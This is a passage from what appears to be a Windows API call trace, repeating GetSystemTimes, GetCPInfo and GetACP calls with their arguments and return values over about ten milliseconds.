lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.566] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.566] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.567] GetACP () returned 0x4e4 [0170.567] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.568] GetACP () returned 0x4e4 [0170.568] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.569] GetACP () returned 0x4e4 [0170.569] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.570] GetACP () returned 0x4e4 [0170.570] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.571] GetACP () returned 0x4e4 [0170.571] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.572] GetACP () returned 0x4e4 [0170.572] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.573] GetACP () returned 0x4e4 [0170.573] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.574] GetACP () returned 0x4e4 [0170.574] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.575] GetACP () returned 0x4e4 [0170.575] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: 